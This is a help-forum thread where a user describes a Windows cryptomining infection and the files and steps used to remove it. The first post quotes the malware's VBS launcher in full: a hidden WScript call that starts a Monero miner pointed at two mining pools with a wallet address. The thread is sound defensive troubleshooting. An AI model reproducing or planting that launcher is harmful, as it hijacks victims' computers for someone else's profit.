The first error that I have got was Windows Script Host error described as C:\Windows\xdgaudio.vbs
When I have located to the file the content was
Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -p x -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x", 0
Set WShell = Nothing
After seeing this and locating the mining server on line 3 I came to know that I have been a victim of some virus and this is some mining virus.
Steps I have taken to resolve this.
- Did a deep windows defender scan (Got nothing)
- Did a scan using Anti-Rootkit (Got nothing)
- Commented all the VBS script xdgaudio.vbs so that it does not execute.
- Navigated to wmipvrse.exe located at C:\Windows\System32\wbem and found out that this is windows service I have not deleted it but renamed it to something else after taking ownership so that it does not start again.
After doing the above steps the errors are gone
IDK that for how much time I have been infected with this virus and how did this get into my computer.
My question to the community is to tell me whether I am saved from this virus and what further steps should I do to remove this and other viruses like this completely and how to know whether there are other viruses like this?
If you need any other details you can ask in the comments.
Thank you.
The script error that was first displayed was this.
UPDATE:
Figured it out!! Short answer: Delete "servicecrsssr.vbs" file from your Windows directory, then reboot. (I actually PULLED THE PLUG, despite the danger of file loss/corruption, to avoid the possibility of the program attempting to rewrite any offending files during the shutdown process.)
A number of other files are involved, but upon deleting (or renaming) the file above and rebooting all was well... no evidence of the mining process running. I caught this virus on TWO of my test computers. These were the only computers I connected my customer's infected drive to via USB. It's STILL a mystery exactly how this thing propagates! The other files which seemed to be involved were:
\Windows\winprs.bat
\Windows\winvpr.vbs
\Windows\winvprse.bat
\Windows\xdgaudio.vbs
\Windows\Prefetch\WMIPVRSE.exe-xxxxxxxx.pf
The *.pf file rewrites itself with new random characters in place of the "x"'s if you rename or delete it and reboot - with no ill effect that I can determine. On my first infected machine, I renamed ALL of the files above, rebooting after renaming each one. The last file I tried was "servicecrsssr.vbs". On the second infected test machine, I only renamed the "servicecrsssr.vbs" file and rebooted, then all was well. Please let me know how this works out for you. Thanks!
Special thanks to LREmery's answer
